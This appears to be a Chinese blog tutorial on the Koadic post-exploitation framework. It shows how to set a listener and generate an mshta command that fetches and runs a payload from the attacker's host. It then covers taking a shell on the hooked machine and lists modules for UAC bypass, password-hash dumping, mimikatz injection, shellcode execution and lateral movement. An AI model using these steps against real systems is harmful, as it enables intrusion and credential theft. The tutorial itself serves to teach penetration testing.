後滲透工具Koadic:你真的瞭解我嗎?
前言:
在朋友的部落格上看到推薦的一款工具Koadic,我接觸了以後發現很不錯這款工具的強大之處我覺得就是拿到shell後的各種模組功能,我就自己寫出來發給大家看看吧。
首先把專案克隆到本地:
專案地址
https://github.com/zerosum0x0/koadic.git
然後解壓,如果你要安裝到你指定的目錄就先cd到那個目錄在下載,我是複製到那了,所以我解壓。如下圖
執行koadic
cd koadic-master/ //cd到軟體目錄 sudo ./koadic //用最高許可權執行koadic
開啟Koadic,顯示需要設定的內容
下圖命令如下
(koadic: sta/js/mshta)# info //
檢視需要設定的內容
檢視工具使用幫助
(koadic: sta/js/mshta)# help
大佬跳過我的翻譯,英語很渣而且是全靠感覺翻譯的(很辛苦,靠經驗和百度翻譯蒙)
(koadic: sta/js/mshta)# help //幫助的意思 COMMAND DESCRIPTION 命令 描述 ——— ————- load reloads all modules //顯示 info shows the current module options//顯示當前模組選項。 use switch to a different module//切換到不同的模組 set sets a variable for the current module//為當前模組設定一個變數 jobs shows info about jobs//顯示有關工作的資訊 help displays help info for a command//獲取一個cmdshell cmdshell command shell to interact with a zombie// 命令 shell 與殭屍互動 kill shows info about jobs//顯示有關工作的資訊 listeners shows info about stagers//顯示資訊的傳輸器載荷 exit exits the program//退出 zombies lists hooked targets//顯示所有殭屍會話 run runs the current module//執行,和exploit一個樣 verbose exits the program//退出程式
進入主題 ,開始設定。聽著是不是熱血沸騰要往下看了,哈哈。其實沒啥要講的,你只需要set lhost
這個命令大家應該都懂得,就是設定本地ip。
如下圖
注意看,他生成了一個網址,
其實這是一個惡意網址,裡面裝載了exploit
最後生成的利用命令如下
mshta http://192.168.0.105:9999/S8QoC
利用方法是放到cmd裡面執行
如下圖
其實你可以看到他彈出了事件檢視器我也不知道為什麼,不是我點開的啊,
也可能會好奇mshta是什麼意思,正解如下
mshta.exe是微軟Windows作業系統相關程式,用於執行.HTA檔案
我想就是這樣利用的吧
那麼當目標主機執行這個命令的時候,我們這邊就反彈回來了會話 會話ID為0
如下圖
如果是用其他複製批量執行了這個命令,會話比較多的話可以執行zombies來檢視左右會話,並選擇id進行控制
然後如果我這裡想獲取一個cmdshell的話,方法如下
cmdshell ID 我這裡應該是 cmdshell 0
如下圖
當然這怎麼能算得上好用的後滲透呢,這怎麼能滿足大家呢
當然了,上面只是普通操作,普通操作,所謂後滲透,在下面,
慢慢看嘛,這個後滲透工具值得上榜的原因我認為有幾條
1.環境要求不高 2.操作很簡單 3.提供的後滲透模組很實用豐富
後滲透模組我就不一個一個講了,設定都很簡單
我主要給你們說一下名字
- Hooks a zombie
- Elevates integrity (UAC Bypass)
- Dumps SAM/SECURITY hive for passwords
- Scans local network for open SMB
- Pivots to another machine
Stagers(傳輸器載荷)
Stagers hook target zombies and allow you to use implants.
傳輸器載荷可以 hook 目標殭屍,進而方便使用植入。
Module |
Description |
---|---|
stager/js/mshta |
可以使用HTML的應用程式在記憶體中的有效載荷mshta.exe |
stager/js/regsvr |
可以使用regsvr32.exe COM+指令碼記憶體負載 |
stager/js/rundll32_js |
serves payloads in memory using rundll32.exe 可以使用rundll32.exe記憶體負載 |
stager/js/disk |
serves payloads using files on disk 使用磁碟上的檔案提供有效載荷 |
Implants(
Implants start jobs on zombies.
Implants 在殭屍上執行。
Module |
Description |
---|---|
implant/elevate/bypassuac_eventvwr |
Uses enigma0x3’s eventvwr.exe exploit to bypass UAC on Windows 7, 8, and 10.使用enigma0x3的eventvwr.exe漏洞繞過UAC的Windows 7, 8,和10。 |
implant/elevate/bypassuac_sdclt |
Uses enigma0x3’s sdclt.exe exploit to bypass UAC on Windows 10.使用enigma0x3的sdclt.exe漏洞繞過UAC的Windows 10。 |
implant/fun/zombie |
Maxes volume and opens The Cranberries YouTube in a hidden window.長量和隱藏的視窗開啟小紅莓YouTube。 |
implant/fun/voice |
Plays a message over text-to-speech.在文字到語音之間傳遞資訊。 |
implant/gather/clipboard |
Retrieves the current content of the user clipboard.檢索使用者剪貼簿的當前內容。 |
implant/gather/hashdump_sam |
Retrieves hashed passwords from the SAM hive.從SAM hive檢索密碼。 |
implant/gather/hashdump_dc |
Domain controller hashes from the NTDS.dit file.域控制器hashes從NTDS。說檔案。 |
implant/inject/mimikatz_dynwrapx |
Injects a reflective-loaded DLL to run powerkatz.dll (using Dynamic Wrapper X).注入一個反射載入的DLL來執行powerkatz。dll(使用動態包裝器X)。 |
implant/inject/mimikatz_dotnet2js |
Injects a reflective-loaded DLL to run powerkatz.dll (@tirannido DotNetToJS).注入一個反射載入的DLL來執行powerkatz。dll(@tirannido DotNetToJS)。 |
implant/inject/shellcode_excel |
Runs arbitrary shellcode payload (if Excel is installed).執行任意的shell程式碼有效負載(如果已經安裝了Excel)。 |
implant/manage/enable_rdesktop |
Enables remote desktop on the target.在目標上啟用遠端桌面。 |
implant/manage/exec_cmd |
Run an arbitrary command on the target, and optionally receive the output.在目標上執行任意命令,並可選地接收輸出。 |
implant/pivot/stage_wmi |
Hook a zombie on another machine using WMI.用WMI把殭屍掛在另一臺機器上。 |
implant/pivot/exec_psexec |
Run a command on another machine using psexec from sysinternals.使用sysinternals中的psexec在另一臺機器上執行一個命令。 |
implant/scan/tcp |
Uses HTTP to scan open TCP ports on the target zombie LAN.使用HTTP掃描目標殭屍網路上的TCP埠。 |
implant/utils/download_file |
Downloads a file from the target zombie.從目標殭屍下載一個檔案 |
implant/utils/upload_file |
Uploads a file from the listening server to the target zombies.上傳一個從監聽伺服器到目標殭屍的檔案 |
Disclaimer 宣告
程式碼示例僅供教育參考,因為只有研究攻擊者使用的攻擊手段,才能建立足夠強大的防禦體系。 在未經事先許可的情況下使用此程式碼對目標系統進行操作是非法的,作者對此不負任何責任。
有不好的地方請指出